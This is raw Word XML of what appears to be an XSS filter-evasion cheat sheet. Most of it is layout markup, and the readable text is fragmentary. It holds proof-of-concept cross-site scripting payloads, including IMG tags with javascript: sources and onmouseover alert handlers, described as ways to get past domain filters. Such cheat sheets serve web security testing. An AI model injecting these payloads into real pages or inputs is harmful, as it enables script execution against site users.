                <v:shape id="Text Box 1373" o:spid="_x0000_s1067" type="#_x0000_t202" style="position:absolute;left:1614;top:252;width:4873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ntzsQA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9C/0PyxS86aYVbE2zipQKQqEY48HjmJ0k&#10;i9nZNLtq+u+7QqG3ebzPyVaDbcWVem8cK3iaJiCIS6cN1woOxWbyCsIHZI2tY1LwQx5Wy4dRhql2&#10;N87pug+1iCHsU1TQhNClUvqyIYt+6jriyFWutxgi7Gupe7zFcNvK5ySZS4uGY0ODHb03VJ73F6tg&#10;feT8w3x/nXZ5lZuiWCT8OT8rNX4c1m8gAg3hX/zn3uo4f/Yyg/s38QS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p7c7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12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SRC=javascript:alert(String.fromCharCode(88,83,83))&gt;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1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="Balk2"/>
      </w:pPr>
      <w:r>
        <w:t>Default</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>SRC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5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Past</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Filters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SRC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Domain</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:line="319" w:lineRule="auto"/>
        <w:ind w:left="154" w:right="210"/>
      </w:pPr>
      <w:r>
        <w:t>This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bypass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7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SRC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>domain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>filters.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Inserting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript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event</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>method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apply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HTML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>tag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-37"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>injection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uses</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>elements</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7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Form,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Iframe,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Input,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Embed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>etc.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allow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6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relevant</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>event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tag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7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to</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:spacing w:line="319" w:lineRule="auto"/>
        <w:sectPr w:rsidR="00AC7743">
          <w:pgSz w:w="11920" w:h="16860"/>
          <w:pgMar w:top="136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12" w:line="333" w:lineRule="auto"/>
        <w:ind w:left="154"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="tr-TR" w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="485635584" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1904365</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>11430</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="363220" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1370" name="Freeform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3220" cy="116205"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="+- 0 3549 2999"/>
                            <a:gd name="T1" fmla="*/ T0 w 572"/>
                            <a:gd name="T2" fmla="+- 0 200 18"/>
                            <a:gd name="T3" fmla="*/ 200 h 183"/>
                            <a:gd name="T4" fmla="+- 0 3021 2999"/>
                            <a:gd name="T5" fmla="*/ T4 w 572"/>
                            <a:gd name="T6" fmla="+- 0 200 18"/>
                            <a:gd name="T7" fmla="*/ 200 h 183"/>
                            <a:gd name="T8" fmla="+- 0 3017 2999"/>
                            <a:gd name="T9" fmla="*/ T8 w 572"/>
                            <a:gd name="T10" fmla="+- 0 200 18"/>
                            <a:gd name="T11" fmla="*/ 200 h 183"/>
                            <a:gd name="T12" fmla="+- 0 2999 2999"/>
                            <a:gd name="T13" fmla="*/ T12 w 572"/>
                            <a:gd name="T14" fmla="+- 0 179 18"/>
                            <a:gd name="T15" fmla="*/ 179 h 183"/>
                            <a:gd name="T16" fmla="+- 0 2999 2999"/>
                            <a:gd name="T17" fmla="*/ T16 w 572"/>
                            <a:gd name="T18" fmla="+- 0 176 18"/>
                            <a:gd name="T19" fmla="*/ 176 h 183"/>
                            <a:gd name="T20" fmla="+- 0 2999 2999"/>
                            <a:gd name="T21" fmla="*/ T20 w 572"/>
                            <a:gd name="T22" fmla="+- 0 39 18"/>
                            <a:gd name="T23" fmla="*/ 39 h 183"/>
                            <a:gd name="T24" fmla="+- 0 3021 2999"/>
                            <a:gd name="T25" fmla="*/ T24 w 572"/>
                            <a:gd name="T26" fmla="+- 0 18 18"/>
                            <a:gd name="T27" fmla="*/ 18 h 183"/>
                            <a:gd name="T28" fmla="+- 0 3549 2999"/>
                            <a:gd name="T29" fmla="*/ T28 w 572"/>
                            <a:gd name="T30" fmla="+- 0 18 18"/>
                            <a:gd name="T31" fmla="*/ 18 h 183"/>
                            <a:gd name="T32" fmla="+- 0 3571 2999"/>
                            <a:gd name="T33" fmla="*/ T32 w 572"/>
                            <a:gd name="T34" fmla="+- 0 39 18"/>
                            <a:gd name="T35" fmla="*/ 39 h 183"/>
                            <a:gd name="T36" fmla="+- 0 3571 2999"/>
                            <a:gd name="T37" fmla="*/ T36 w 572"/>
                            <a:gd name="T38" fmla="+- 0 179 18"/>
                            <a:gd name="T39" fmla="*/ 179 h 183"/>
                            <a:gd name="T40" fmla="+- 0 3553 2999"/>
                            <a:gd name="T41" fmla="*/ T40 w 572"/>
                            <a:gd name="T42" fmla="+- 0 200 18"/>
                            <a:gd name="T43" fmla="*/ 200 h 183"/>
                            <a:gd name="T44" fmla="+- 0 3549 2999"/>
                            <a:gd name="T45" fmla="*/ T44 w 572"/>
                            <a:gd name="T46" fmla="+- 0 200 18"/>
                            <a:gd name="T47" fmla="*/ 200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572" h="183">
                              <a:moveTo>
                                <a:pt x="550" y="182"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="22" y="182"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="18" y="182"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="161"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="158"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="21"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="22" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="550" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="572" y="21"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="572" y="161"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="554" y="182"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="550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30B34" id="Freeform 1371" o:spid="_x0000_s1026" style="position:absolute;margin-left:149.95pt;margin-top:.9pt;width:28.6pt;height:9.15pt;z-index:-1768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" path="m550,182r-528,l18,182,,161r,-3l,21,22,,550,r22,21l572,161r-18,21l550,182xe" fillcolor="#f5f5f5" stroked="f">
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="349250,127000;13970,127000;11430,127000;0,113665;0,111760;0,24765;13970,11430;349250,11430;363220,24765;363220,113665;351790,127000;349250,127000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2313305</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>11430</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="424815" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1367" name="Group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815" cy="116205"/>
                          <a:chOff x="3643" y="18"/>
                          <a:chExt cx="669" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1368" name="Freeform 1370"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="3643" y="18"/>
                            <a:ext cx="669" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 4291 3643"/>
                              <a:gd name="T1" fmla="*/ T0 w 669"/>
                              <a:gd name="T2" fmla="+- 0 200 18"/>
                              <a:gd name="T3" fmla="*/ 200 h 183"/>
                              <a:gd name="T4" fmla="+- 0 3665 3643"/>
                              <a:gd name="T5" fmla="*/ T4 w 669"/>
                              <a:gd name="T6" fmla="+- 0 200 18"/>
                              <a:gd name="T7" fmla="*/ 200 h 183"/>
                              <a:gd name="T8" fmla="+- 0 3661 3643"/>
                              <a:gd name="T9" fmla="*/ T8 w 669"/>
                              <a:gd name="T10" fmla="+- 0 200 18"/>
                              <a:gd name="T11" fmla="*/ 200 h 183"/>
                              <a:gd name="T12" fmla="+- 0 3643 3643"/>
                              <a:gd name="T13" fmla="*/ T12 w 669"/>
                              <a:gd name="T14" fmla="+- 0 179 18"/>
                              <a:gd name="T15" fmla="*/ 179 h 183"/>
                              <a:gd name="T16" fmla="+- 0 3643 3643"/>
                              <a:gd name="T17" fmla="*/ T16 w 669"/>
                              <a:gd name="T18" fmla="+- 0 176 18"/>
                              <a:gd name="T19" fmla="*/ 176 h 183"/>
                              <a:gd name="T20" fmla="+- 0 3643 3643"/>
                              <a:gd name="T21" fmla="*/ T20 w 669"/>
                              <a:gd name="T22" fmla="+- 0 39 18"/>
                              <a:gd name="T23" fmla="*/ 39 h 183"/>
                              <a:gd name="T24" fmla="+- 0 3665 3643"/>
                              <a:gd name="T25" fmla="*/ T24 w 669"/>
                              <a:gd name="T26" fmla="+- 0 18 18"/>
                              <a:gd name="T27" fmla="*/ 18 h 183"/>
                              <a:gd name="T28" fmla="+- 0 4291 3643"/>
                              <a:gd name="T29" fmla="*/ T28 w 669"/>
                              <a:gd name="T30" fmla="+- 0 18 18"/>
                              <a:gd name="T31" fmla="*/ 18 h 183"/>
                              <a:gd name="T32" fmla="+- 0 4312 3643"/>
                              <a:gd name="T33" fmla="*/ T32 w 669"/>
                              <a:gd name="T34" fmla="+- 0 39 18"/>
                              <a:gd name="T35" fmla="*/ 39 h 183"/>
                              <a:gd name="T36" fmla="+- 0 4312 3643"/>
                              <a:gd name="T37" fmla="*/ T36 w 669"/>
                              <a:gd name="T38" fmla="+- 0 179 18"/>
                              <a:gd name="T39" fmla="*/ 179 h 183"/>
                              <a:gd name="T40" fmla="+- 0 4294 3643"/>
                              <a:gd name="T41" fmla="*/ T40 w 669"/>
                              <a:gd name="T42" fmla="+- 0 200 18"/>
                              <a:gd name="T43" fmla="*/ 200 h 183"/>
                              <a:gd name="T44" fmla="+- 0 4291 3643"/>
                              <a:gd name="T45" fmla="*/ T44 w 669"/>
                              <a:gd name="T46" fmla="+- 0 200 18"/>
                              <a:gd name="T47" fmla="*/ 20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69" h="183">
                                <a:moveTo>
                                  <a:pt x="648" y="182"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="22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lnTo>
                                  <a:pt x="648" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="669" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="669" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="651" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="64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" name="Text Box 1369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18"/>
                            <a:ext cx="66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9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onclick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8" o:spid="_x0000_s1068" style="position:absolute;left:0;text-align:left;margin-left:182.15pt;margin-top:.9pt;width:33.45pt;height:9.15pt;z-index:15738368;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="3643,18" coordsize="66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">
                <v:shape id="Freeform 1370" o:spid="_x0000_s1069" style="position:absolute;left:3643;top:18;width:669;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="66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cLYMcA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbESPQUvDQBCF74L/YRnBm9nYQimx2yKlUumh2FTF45gd&#10;k9DsbNjdNvHfOwehtxnem/e+WaxG16kLhdh6NvCY5aCIK29brg28H18e5qBiQrbYeSYDvxRhtby9&#10;WWBh/cAHupSpVhLCsUADTUp9oXWsGnIYM98Ti/bjg8Mka6i1DThIuOv0JM9n2mHL0tBgT+uGqlN5&#10;dga+d/vt+lTGzXk4fITN11v1OQ1zY+7vxucnUInGdDX/X79awZ/OBFe+kRH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HC2DHAAAA3QAAAA8AAAAAAAAAAAAAAAAAmAIAAGRy&#10;cy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACMAwAAAAA=&#10;" path="m648,182r-626,l18,182,,161r,-3l,21,22,,648,r21,21l669,161r-18,21l648,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="648,200;22,200;18,200;0,179;0,176;0,39;22,18;648,18;669,39;669,179;651,200;648,200" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1369" o:spid="_x0000_s1070" type="#_x0000_t202" style="position:absolute;left:3643;top:18;width:66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hM+cMA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9C/0Pywi96UYLoaauIkVBKBRjPHicZsdk&#10;MTsbs6um/74rFLzN433OfNnbRtyo88axgsk4AUFcOm24UnAoNqN3ED4ga2wck4Jf8rBcvAzmmGl3&#10;55xu+1CJGMI+QwV1CG0mpS9rsujHriWO3Ml1FkOEXSV1h/cYbhs5TZJUWjQcG2ps6bOm8ry/WgWr&#10;I+drc/n+2eWn3BTFLOGv9KzU67BffYAI1Ien+N+91XH+WzqDxzfx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hM+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9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onclick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5"/>
        </w:rPr>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="14"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>substituted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="14"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>like</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="24"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console"/>
          <w:color w:val="36454E"/>
          <w:w w:val="95"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>onblur</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console"/>
          <w:color w:val="36454E"/>
          <w:spacing w:val="-41"/>
          <w:w w:val="95"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-35"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Submitted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6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David</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Cross</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="12"/>
        <w:ind w:left="154"/>
      </w:pPr>
      <w:r>
        <w:br w:type="column"/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>giving</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7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extensive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>amount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variations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many</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>injections</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>listed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>here.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num="2" w:space="708" w:equalWidth="0">
            <w:col w:w="2187" w:space="550"/>
            <w:col w:w="6283"/>
          </w:cols>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="159"/>
        <w:ind w:left="154"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Edited</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="17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Abdullah</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Hussam(@Abdulahhusam).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="8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160020</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2083435" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="1364" name="Group 1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3435" cy="116205"/>
                          <a:chOff x="1614" y="252"/>
                          <a:chExt cx="3281" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1365" name="Freeform 1367"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="251"/>
                            <a:ext cx="3281" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 4874 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 3281"/>
                              <a:gd name="T2" fmla="+- 0 434 252"/>
                              <a:gd name="T3" fmla="*/ 434 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 3281"/>
                              <a:gd name="T6" fmla="+- 0 434 252"/>
                              <a:gd name="T7" fmla="*/ 434 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 3281"/>
                              <a:gd name="T10" fmla="+- 0 433 252"/>
                              <a:gd name="T11" fmla="*/ 433 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 3281"/>
                              <a:gd name="T14" fmla="+- 0 413 252"/>
                              <a:gd name="T15" fmla="*/ 413 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 3281"/>
                              <a:gd name="T18" fmla="+- 0 410 252"/>
                              <a:gd name="T19" fmla="*/ 410 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 3281"/>
                              <a:gd name="T22" fmla="+- 0 273 252"/>
                              <a:gd name="T23" fmla="*/ 273 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 3281"/>
                              <a:gd name="T26" fmla="+- 0 252 252"/>
                              <a:gd name="T27" fmla="*/ 252 h 183"/>
                              <a:gd name="T28" fmla="+- 0 4874 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 3281"/>
                              <a:gd name="T30" fmla="+- 0 252 252"/>
                              <a:gd name="T31" fmla="*/ 252 h 183"/>
                              <a:gd name="T32" fmla="+- 0 4895 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 3281"/>
                              <a:gd name="T34" fmla="+- 0 273 252"/>
                              <a:gd name="T35" fmla="*/ 273 h 183"/>
                              <a:gd name="T36" fmla="+- 0 4895 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 3281"/>
                              <a:gd name="T38" fmla="+- 0 413 252"/>
                              <a:gd name="T39" fmla="*/ 413 h 183"/>
                              <a:gd name="T40" fmla="+- 0 4877 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 3281"/>
                              <a:gd name="T42" fmla="+- 0 433 252"/>
                              <a:gd name="T43" fmla="*/ 433 h 183"/>
                              <a:gd name="T44" fmla="+- 0 4874 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 3281"/>
                              <a:gd name="T46" fmla="+- 0 434 252"/>
                              <a:gd name="T47" fmla="*/ 43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281" h="183">
                                <a:moveTo>
                                  <a:pt x="326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260" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3281" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3281" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3263" y="181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="326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1"/>
                            <a:ext cx="328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SRC=#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4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onmouseover="alert('xxs')"&gt;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5" o:spid="_x0000_s1071" style="position:absolute;margin-left:80.7pt;margin-top:12.6pt;width:164.05pt;height:9.15pt;z-index:-15721984;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,252" coordsize="328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">
                <v:shape id="Freeform 1367" o:spid="_x0000_s1072" style="position:absolute;left:1614;top:251;width:3281;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="328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D1t8UA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERP22rCQBB9F/yHZQTfdGPFW+oqIhYKBcVYSvs2ZKfZ&#10;0OxsyK4x/ftuQfBtDuc6621nK9FS40vHCibjBARx7nTJhYL3y8toCcIHZI2VY1LwSx62m35vjal2&#10;Nz5Tm4VCxBD2KSowIdSplD43ZNGPXU0cuW/XWAwRNoXUDd5iuK3kU5LMpcWSY4PBmvaG8p/sahUs&#10;v1aLqcl2h8PsePqcXFfy+PbRKjUcdLtnEIG68BDf3a86zp/OZ/D/TTxB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YPW3xQAAAN0AAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m3260,182l21,182r-3,-1l,161r,-3l,21,21,,3260,r21,21l3281,161r-18,20l3260,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="3260,434;21,434;18,433;0,413;0,410;0,273;21,252;3260,252;3281,273;3281,413;3263,433;3260,434" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1366" o:spid="_x0000_s1073" type="#_x0000_t202" style="position:absolute;left:1614;top:251;width:328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fYi8QA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9F/wPywi91Y0thDa6EZEWhEIxxoPHMTtJ&#10;FrOzaXbV9N93hUJv83ifs1yNthNXGrxxrGA+S0AQV04bbhQcyo+nVxA+IGvsHJOCH/KwyicPS8y0&#10;u3FB131oRAxhn6GCNoQ+k9JXLVn0M9cTR652g8UQ4dBIPeAthttOPidJKi0ajg0t9rRpqTrvL1bB&#10;+sjFu/n+Ou2KujBl+ZbwZ3pW6nE6rhcgAo3hX/zn3uo4/yVN4f5NP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H2Iv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4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SRC=#</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="44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onmouseover="alert('xxs')"&gt;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1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="Balk2"/>
      </w:pPr>
      <w:r>
        <w:t>Default</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>SRC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7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Leaving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Empty</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="10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161290</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2029460" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="1361" name="Group 1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9460" cy="116205"/>
                          <a:chOff x="1614" y="254"/>
                          <a:chExt cx="3196" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1362" name="Freeform 1364"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="253"/>
                            <a:ext cx="3196" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
